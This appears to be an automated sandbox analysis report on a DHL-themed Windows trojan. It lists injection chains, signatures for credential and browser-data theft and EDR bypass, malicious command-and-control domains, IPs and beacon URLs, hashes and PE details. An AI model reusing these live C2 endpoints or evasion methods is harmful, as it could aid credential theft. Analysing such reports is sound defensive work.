                  Signatures: Binary is likely a compiled AutoIt script file; Found API chain indicative of sandbox detection; Writes to foreign memory regions; 2 other signatures
                  started: svchost.exe (node 13)
                svchost.exe (node 13)
                  Signatures: Maps a DLL or memory area into another process
                  injected: AUHJGnjYgKTjWw.exe (node 16)
                AUHJGnjYgKTjWw.exe (node 16)
                  Signatures: Windows Update Standalone Installer command line found (may be used to bypass UAC); Found direct / indirect Syscall (likely to bypass EDR)
                  started: net.exe 13 (node 19); wusa.exe (node 22)
                net.exe (node 19)
                  Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                  injected: AUHJGnjYgKTjWw.exe (node 24)
                  started: firefox.exe (node 28)
                AUHJGnjYgKTjWw.exe (node 24)
                  DNS/IP: www.harmonid.life 203.161.49.193, 50032, 50033, 80 VNPT-AS-VNVNPTCorpVN Malaysia; wcp95.top 154.23.184.95, 49981, 49996, 50011 COGENT-174US United States; 7 other IPs or domains
                  Signatures: Found direct / indirect Syscall (likely to bypass EDR)

Source | Detection | Scanner | Label | Link
DHL_IMPORT_8236820594.exe | 63% | ReversingLabs | Win32.Trojan.AutoitInject |
DHL_IMPORT_8236820594.exe | 100% | Avira | DR/AutoIt.Gen8 |
DHL_IMPORT_8236820594.exe | 100% | Joe Sandbox ML | |
No Antivirus matches
Source | Detection | Scanner | Label | Link
https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe |
https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe |
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe |
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe |
https://getbootstrap.com/) | 0% | URL Reputation | safe |
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe |
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe |
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe |
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
trifecta.center | 3.33.130.190 | true | true | | unknown
wcp95.top | 154.23.184.95 | true | true | | unknown
wddb97.top | 206.119.82.172 | true | true | | unknown
www.gokulmohan.online | 172.67.185.22 | true | true | | unknown
www.harmonid.life | 203.161.49.193 | true | true | | unknown
roopiedutech.online | 103.191.208.137 | true | true | | unknown
iuyi542.xyz | 38.47.237.27 | true | true | | unknown
www.vrxlzluy.shop | 188.114.96.3 | true | true | | unknown
www.comvq.fun | 3.111.160.216 | true | true | | unknown
www.wcp95.top | unknown | unknown | false | | unknown
www.iuyi542.xyz | unknown | unknown | true | | unknown
www.wddb97.top | unknown | unknown | false | | unknown
www.trifecta.center | unknown | unknown | false | | unknown
www.roopiedutech.online | unknown | unknown | false | | unknown
www.xtelify.tech | unknown | unknown | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.iuyi542.xyz/b6lw/?XbDhGVR=FO9SkkJ/zSkBY2gKE3XjGE22XLVH89fAFT5UFdCZW5l7B5PRw+4+Jbotmp48rM/okqGzRuEUvPhZhQzUiZGHGB1tKbDdMwj50dTtgpwp3v/R5pIWGJdc6oQ=&Qz=BJvp0BdhxXiTCTGP | false | | unknown
http://www.wddb97.top/a3g3/ | true | | unknown
http://www.vrxlzluy.shop/o91n/?XbDhGVR=Thp61v6sOdtIOU1AhqZOcShyli3Q2Rus+09XFbP+3c72g6WMTcCeHGHsKE18csM01zHbC+82zyOO8bx37pnUbuImGHRIRsUOfuHIGVgprfqSQRJiadd1v3E=&Qz=BJvp0BdhxXiTCTGP | true | | unknown
http://www.trifecta.center/3c6w/?XbDhGVR=FJ83cOvFWEccIB8Y6SCsBqJgMlFSJUXICv/nsL67hA7PUBbPcYUeOgrdyaqmH9Z1A+LVMRCMzG0eJtFhxlj35v5UnzdVcRI8ETGcI3l1N4u34k5Wtd8PhNs=&Qz=BJvp0BdhxXiTCTGP | true | | unknown
http://www.vrxlzluy.shop/o91n/ | true | | unknown
http://www.harmonid.life/aq3t/ | true | | unknown
http://www.wcp95.top/rj0s/ | true | | unknown
http://www.wcp95.top/rj0s/?XbDhGVR=wwfrpq2GStq8yXhruzchqPI2DPKMclx/34kF3CMx+1v+TSw3PCRza/Sx++Q9wxTideP8HMqKtaf0MdZtX7Zp7/WG/Y2BEJVTn7MuHEHfS2P/6TB7VaKsbng=&Qz=BJvp0BdhxXiTCTGP | true | | unknown
http://www.gokulmohan.online/xh7d/?XbDhGVR=lbj31sdPKdIucqFOkkGE3KM3+04tAjUV11hc/ilEwtgrKZz4woi/xCbjO8SSPcCwKsmvKoPyP7HvBY60bpiIs0q+jugQSLxZIHi4ORfVnf3fP4vxqk9k0cQ=&Qz=BJvp0BdhxXiTCTGP | true | | unknown
http://www.roopiedutech.online/3m9t/?XbDhGVR=siOGj5B0XutXYSucsd0fIKR0LQH5vUluc52n7Rs3scAygCFhnhDrxADoQHiHBruo5ppO8xHCx+tj/iffFnkB/SDXcvjAJfIbSWg6DSwwu1sipuRv+U7XkBw=&Qz=BJvp0BdhxXiTCTGP | true | | unknown
http://www.roopiedutech.online/3m9t/ | true | | unknown
http://www.trifecta.center/3c6w/ | true | | unknown
http://www.comvq.fun/aajw/ | true | | unknown
http://www.comvq.fun/aajw/?Qz=BJvp0BdhxXiTCTGP&XbDhGVR=lJ+qR9qEWHtEYfdYXX38H63zdICQzTmBsURfekuXE7iDW/5kFwCD5SzXO8//IXYeWe3pPDw5e3u+RAlULoDse9ZEd7r2QSdjEk66OCO0EG57H2Th8v5BKcw= | true | | unknown
http://www.gokulmohan.online/xh7d/ | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | net.exe, 00000007.00000003.2314174450.000000000776D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://vrxlzluy.shop/o91n/?XbDhGVR=Thp61v6sOdtIOU1AhqZOcShyli3Q2Rus | net.exe, 00000007.00000002.3519002309.0000000003A56000.00000004.10000000.00040000.00000000.sdmp, AUHJGnjYgKTjWw.exe, 00000009.00000002.3518574078.0000000003106000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
https://duckduckgo.com/ac/?q= | net.exe, 00000007.00000003.2314174450.000000000776D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | net.exe, 00000007.00000003.2314174450.000000000776D000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://www.harmonid.life | AUHJGnjYgKTjWw.exe, 00000009.00000002.3520205826.0000000005026000.00000040.80000000.00040000.00000000.sdmp | false | | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | net.exe, 00000007.00000003.2314174450.000000000776D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | net.exe, 00000007.00000003.2314174450.000000000776D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://getbootstrap.com/) | net.exe, 00000007.00000002.3519002309.00000000038C4000.00000004.10000000.00040000.00000000.sdmp, AUHJGnjYgKTjWw.exe, 00000009.00000002.3518574078.0000000002F74000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2418472075.000000001FFB4000.00000004.80000000.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.ecosia.org/newtab/ | net.exe, 00000007.00000003.2314174450.000000000776D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ac.ecosia.org/autocomplete?q= | net.exe, 00000007.00000003.2314174450.000000000776D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://roopiedutech.online/3m9t/?XbDhGVR=siOGj5B0XutXYSucsd0fIKR0LQH5vUluc52n7Rs3scAygCFhnhDrxADoQHi | net.exe, 00000007.00000002.3519002309.00000000043C2000.00000004.10000000.00040000.00000000.sdmp, AUHJGnjYgKTjWw.exe, 00000009.00000002.3518574078.0000000003A72000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | net.exe, 00000007.00000003.2314174450.000000000776D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/twbs/bootstrap/blob/master/LICENSE) | net.exe, 00000007.00000002.3519002309.00000000038C4000.00000004.10000000.00040000.00000000.sdmp, AUHJGnjYgKTjWw.exe, 00000009.00000002.3518574078.0000000002F74000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2418472075.000000001FFB4000.00000004.80000000.00040000.00000000.sdmp | false | | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | net.exe, 00000007.00000003.2314174450.000000000776D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.gokulmohan.online/xh7d/?XbDhGVR=lbj31sdPKdIucqFOkkGE3KM3 | net.exe, 00000007.00000002.3519002309.0000000003F0C000.00000004.10000000.00040000.00000000.sdmp, AUHJGnjYgKTjWw.exe, 00000009.00000002.3518574078.00000000035BC000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
206.119.82.172 | wddb97.top | United States | 174 | COGENT-174US | true
38.47.237.27 | iuyi542.xyz | United States | 174 | COGENT-174US | true
203.161.49.193 | www.harmonid.life | Malaysia | 45899 | VNPT-AS-VNVNPTCorpVN | true
188.114.96.3 | www.vrxlzluy.shop | European Union | 13335 | CLOUDFLARENETUS | true
103.191.208.137 | roopiedutech.online | unknown | 7575 | AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | true
3.111.160.216 | www.comvq.fun | United States | 16509 | AMAZON-02US | true
154.23.184.95 | wcp95.top | United States | 174 | COGENT-174US | true
3.33.130.190 | trifecta.center | United States | 8987 | AMAZONEXPANSIONGB | true
172.67.185.22 | www.gokulmohan.online | United States | 13335 | CLOUDFLARENETUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1547007
Start date and time: 2024-11-01 19:41:55 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 8s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: DHL_IMPORT_8236820594.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@9/2@10/9
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 95%
• Number of executed functions: 44
• Number of non-executed functions: 306
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Excluded processes from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target AUHJGnjYgKTjWw.exe, PID 6016 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded the maximum time and may have missing disassembly code information
• Report size exceeded the maximum capacity and may have missing disassembly code
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: DHL_IMPORT_8236820594.exe
Time | Type | Description
14:44:08 | API Interceptor | 5509102x Sleep call for process: net.exe modified
Matches by IP (the "Get hash" and "Browse" link buttons of the original table are omitted):
Match | Associated Sample Name / URL | Detection | Threat Name | Context
206.119.82.172 | Arrival Notice_pdf.exe | malicious | FormBook | www.d97fw.top/07qt/
206.119.82.172 | RECIEPT.PDF.exe | malicious | FormBook | www.d97fw.top/j0mp/
203.161.49.193 | Statement Cargomind 2024-09-12 (K07234).exe | malicious | FormBook | www.fitlifa.xyz/6tsn/
203.161.49.193 | Payment&WarantyBonds.exe | malicious | FormBook | www.simplek.top/ep69/
203.161.49.193 | Payment&WarantyBonds.exe | malicious | FormBook | www.simplek.top/ep69/
203.161.49.193 | SALARY OF OCT 2024.exe | malicious | FormBook | www.futurevision.life/hxmz/
203.161.49.193 | Udspecialiser45.exe | malicious | FormBook, GuLoader | www.funtechie.top/udud/
203.161.49.193 | qEW7hMvyV7.exe | malicious | FormBook | www.winnov8.top/abt9/
203.161.49.193 | PR44238-43433.exe | malicious | FormBook | www.innovtech.life/nq8t/
203.161.49.193 | RFQ-9877678-9988876509886546887.exe | malicious | FormBook | www.innovtech.life/nq8t/
203.161.49.193 | RFQ-9877678-9988876509886546884.exe | malicious | FormBook | www.innovtech.life/nq8t/
203.161.49.193 | Bootblacks.exe | malicious | FormBook, GuLoader | www.funtechie.top/udud/
188.114.96.3 | rQUOTATION_NOVQTRA071244__PDF.scr.exe | malicious | Snake Keylogger | filetransfer.io/data-package/8Koz7PwT/download
188.114.96.3 | PRICE ENQUIRY - RFQ 6000073650.exe | malicious | Azorult, GuLoader | e3z1.shop/HT341/index.php
188.114.96.3 | NF_Payment_Ref_FAN930276.exe | malicious | FormBook | www.timizoasisey.shop/3p0l/
188.114.96.3 | FW CMA SHZ Freight invoice CHN1080769.exe | malicious | FormBook | www.bayarcepat19.click/5hcm/
188.114.96.3 | greenthingswithgreatnewsforgetmeback.hta | malicious | Cobalt Strike, HTMLPhisher | paste.ee/d/sTNna
188.114.96.3 | Lana_Rhoades_Photoos.js | malicious | Unknown | paste.ee/d/ciuNW
188.114.96.3 | PO-000172483 (2).exe | malicious | FormBook, GuLoader | www.launchdreamidea.xyz/2b9b/
188.114.96.3 | VfKk5EmvwW.exe | malicious | DCRat, PureLog Stealer, zgRAT | 083098cm.n9shteam.in/vmBase.php
188.114.96.3 | Payment Slip_SJJ023639#U00faPDF.scr.exe | malicious | Snake Keylogger | filetransfer.io/data-package/CEqTVkxM/download
188.114.96.3 | 0JLWNg4Sz1.exe | malicious | DCRat, PureLog Stealer, zgRAT | 977255cm.nyashkoon.in/secureWindows.php

Matches by domain:
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.gokulmohan.online | FACTURA A-7507_H1758.exe | malicious | GuLoader | 104.21.64.124
www.comvq.fun | mm.exe | malicious | Unknown | 3.111.160.216

Matches by ASN:
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 188.114.96.3
CLOUDFLARENETUS | https://docsend.com/view/yvdhrcvq4c4p7xrd | malicious | HTMLPhisher | 104.17.24.14
CLOUDFLARENETUS | https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=sf_rand_string_mixed(5)FgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fir.nbaikp3.sa.com%2Fdelaw%2Flawn%2Fkoo%2Fsf_rand_string_mixed(24)/william.ferebee@steptoe-johnson.com | malicious | HTMLPhisher | 104.17.25.14
CLOUDFLARENETUS | rQUOTATION_NOVQTRA071244__PDF.scr.exe | malicious | Snake Keylogger | 188.114.96.3
CLOUDFLARENETUS | https://issuu.com/mathildagr/docs/pmd9746827?fr=sZTMyNjc4NzAyNzM | malicious | Unknown | 104.17.24.14
CLOUDFLARENETUS | DMv89K955Y.exe | malicious | LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer | 104.21.33.140
CLOUDFLARENETUS | Setup.exe | malicious | Unknown | 1.1.1.1
CLOUDFLARENETUS | iIDqizT3Wx.exe | malicious | LummaC | 104.21.33.140
CLOUDFLARENETUS | hkpqXovZtS.exe | malicious | NetSupport RAT | 104.26.0.231
CLOUDFLARENETUS | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 188.114.97.3
COGENT-174US | draft contract for order #782334.exe | malicious | FormBook | 38.47.232.160
COGENT-174US | VkTNb6p288.exe | malicious | FormBook | 154.7.176.67
                                                                                        NF_Payment_Ref_FAN930276.exeGet hashmaliciousFormBookBrowse
                                                                                        • 38.88.82.56
                                                                                        71Ah2iqq3g.dllGet hashmaliciousAmadeyBrowse
                                                                                        • 45.93.20.135
                                                                                        71Ah2iqq3g.dllGet hashmaliciousAmadeyBrowse
                                                                                        • 45.93.20.135
                                                                                        1nnlXctdko.dllGet hashmaliciousAmadeyBrowse
                                                                                        • 45.93.20.135
                                                                                        HT9324-25 1x40HC LDHFCLDEHAM29656 MRSU5087674.exeGet hashmaliciousFormBookBrowse
                                                                                        • 154.23.181.7
                                                                                        18in SPA-198-2024.exeGet hashmaliciousFormBookBrowse
                                                                                        • 38.88.82.56
                                                                                        WARUNKI UMOWY-pdf.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                        • 38.88.82.56
                                                                                        bszYGSIHuU.exeGet hashmaliciousUnknownBrowse
                                                                                        • 38.180.123.95
                                                                                        COGENT-174USdraft contract for order #782334.exeGet hashmaliciousFormBookBrowse
                                                                                        • 38.47.232.160
                                                                                        VkTNb6p288.exeGet hashmaliciousFormBookBrowse
                                                                                        • 154.7.176.67
                                                                                        NF_Payment_Ref_FAN930276.exeGet hashmaliciousFormBookBrowse
                                                                                        • 38.88.82.56
                                                                                        71Ah2iqq3g.dllGet hashmaliciousAmadeyBrowse
                                                                                        • 45.93.20.135
                                                                                        71Ah2iqq3g.dllGet hashmaliciousAmadeyBrowse
                                                                                        • 45.93.20.135
                                                                                        1nnlXctdko.dllGet hashmaliciousAmadeyBrowse
                                                                                        • 45.93.20.135
                                                                                        HT9324-25 1x40HC LDHFCLDEHAM29656 MRSU5087674.exeGet hashmaliciousFormBookBrowse
                                                                                        • 154.23.181.7
                                                                                        18in SPA-198-2024.exeGet hashmaliciousFormBookBrowse
                                                                                        • 38.88.82.56
                                                                                        WARUNKI UMOWY-pdf.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                        • 38.88.82.56
                                                                                        bszYGSIHuU.exeGet hashmaliciousUnknownBrowse
                                                                                        • 38.180.123.95
                                                                                        VNPT-AS-VNVNPTCorpVNStatement Cargomind 2024-09-12 (K07234).exeGet hashmaliciousFormBookBrowse
                                                                                        • 203.161.49.193
                                                                                        Payment&WarantyBonds.exeGet hashmaliciousFormBookBrowse
                                                                                        • 203.161.49.193
                                                                                        Payment&WarantyBonds.exeGet hashmaliciousFormBookBrowse
                                                                                        • 203.161.49.193
                                                                                        wZU2edEGL3.elfGet hashmaliciousUnknownBrowse
                                                                                        • 113.178.195.24
                                                                                        B6eg13TpEH.elfGet hashmaliciousUnknownBrowse
                                                                                        • 113.178.122.51
                                                                                        jew.x86.elfGet hashmaliciousMiraiBrowse
                                                                                        • 113.166.50.124
                                                                                        jew.mips.elfGet hashmaliciousMiraiBrowse
                                                                                        • 113.160.104.193
                                                                                        jew.spc.elfGet hashmaliciousMiraiBrowse
                                                                                        • 14.245.79.86
                                                                                        jew.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                        • 14.188.62.1
                                                                                        la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                        • 113.179.13.83
                                                                                        No context
                                                                                        No context
Process: C:\Windows\SysWOW64\net.exe
File Type: SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category: dropped
Size (bytes): 114688
Entropy (8bit): 0.9746603542602881
Encrypted: false
SSDEEP: 192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5: 780853CDDEAEE8DE70F28A4B255A600B
SHA1: AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256: 1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512: E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious: false
Reputation: high, very likely benign file

Process: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe
File Type: data
Category: dropped
Size (bytes): 289280
Entropy (8bit): 7.991340730173181
Encrypted: true
SSDEEP: 6144:NgvzoZFqDvBeVTAwh8myPJ6AXaT1N9ALSP+TGd7EdB:mzoZVV0tmyPZaTT+iq/
MD5: 209009BA6035082F8D90CB12853569DA
SHA1: 68F3132079050C772B5F8DD16988697AE256CC3D
SHA-256: 7C25AED06B720A18735AA50CEBBD098150542AC3A18E8A881E74A56A8B3CAC60
SHA-512: EB3ABC943F8F2434CB9E75DB076EA9247E05581BC0DF65AED46C27BBD4FEE16F9ECDA8BF2C9CE3A185309E161B38B87EA809610162F3A7AEABC12A9D9D9A93AD
Malicious: false
Reputation: low

File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.431456956182069
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: DHL_IMPORT_8236820594.exe
File size: 1'632'256 bytes
MD5: 2f01c94df712e58b8227588ba7a376c6
SHA1: 05b93bdaf9c8bdb42e6888e2f1d292ad1b9bc908
SHA256: 5a8b2ff82ebbee4b3d5baf85be0af29029669da8c2cde057affaca52c5c94fc0
SHA512: 3f4447e0788a35e9c0468e376dc7872a2d9b119bb0ae35333c3393c78572d2155656e3bbb33f5817ceacdffbfaee75e47937fe6702ef2018ba67ce43f73a4784
SSDEEP: 24576:IqDEvCTbMWu7rQYlBQcBiT6rprG8abzTeL2pAMdIFLleODoCGDYKmMOlsVF:ITvC/MTQYxsWR7abPeSpAaI/aYKmMO
TLSH: 7A75E00273D1C062FFAB92334B5AE6514BBC6A260123E51F13981DBAFD705B1563E7A3
File Content Preview: MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....
Icon Hash: aaf3e3e3938382a0
Entrypoint: 0x420577
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x6724106E [Thu Oct 31 23:19:10 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 948cc502fe9226992dce9417f952fce3

Instruction
call 00007F41948E00A3h
jmp 00007F41948DF9AFh
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F41948DFB8Dh
mov dword ptr [esi], 0049FDF0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FDF8h
mov dword ptr [ecx], 0049FDF0h
ret
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F41948DFB5Ah
mov dword ptr [esi], 0049FE0Ch
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FE14h
mov dword ptr [ecx], 0049FE0Ch
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
and dword ptr [eax], 00000000h
and dword ptr [eax+04h], 00000000h
push eax
mov eax, dword ptr [ebp+08h]
add eax, 04h
push eax
call 00007F41948E274Dh
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
lea eax, dword ptr [ecx+04h]
mov dword ptr [ecx], 0049FDD0h
push eax
call 00007F41948E2798h
pop ecx
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
push eax
call 00007F41948E2781h
test byte ptr [ebp+08h], 00000001h
pop ecx

Programming Language:
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc8e64 | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xd4000 | 0xb7c70 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x18c000 | 0x7594 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xb0ff0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xc3400 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb1010 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x9c000 | 0x894 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x9ab1d | 0x9ac00 | 0a1473f3064dcbc32ef93c5c8a90f3a6 | False | 0.565500681542811 | data | 6.668273581389308 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x9c000 | 0x2fb82 | 0x2fc00 | c9cf2468b60bf4f80f136ed54b3989fb | False | 0.35289185209424084 | data | 5.691811547483722 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xcc000 | 0x706c | 0x4800 | 53b9025d545d65e23295e30afdbd16d9 | False | 0.04356553819444445 | DOS executable (block device driver @\273\) | 0.5846666986982398 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xd4000 | 0xb7c70 | 0xb7e00 | 9ca1a06589e0f4dd155169bf4c49034c | False | 0.9651358557104011 | data | 7.966481853020651 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x18c000 | 0x7594 | 0x7600 | c68ee8931a32d45eb82dc450ee40efc3 | False | 0.7628111758474576 | data | 6.7972128181359786 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xd44a0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xd45c8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xd48b0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xd49d8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xd5880 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xd6128 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xd6690 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xd8c38 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xd9ce0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_STRING | 0xda148 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xda6dc | 0x68a | data | English | Great Britain | 0.2735961768219833
RT_STRING | 0xdad68 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xdb1f8 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xdb7f4 | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xdbe50 | 0x466 | data | English | Great Britain | 0.3605683836589698
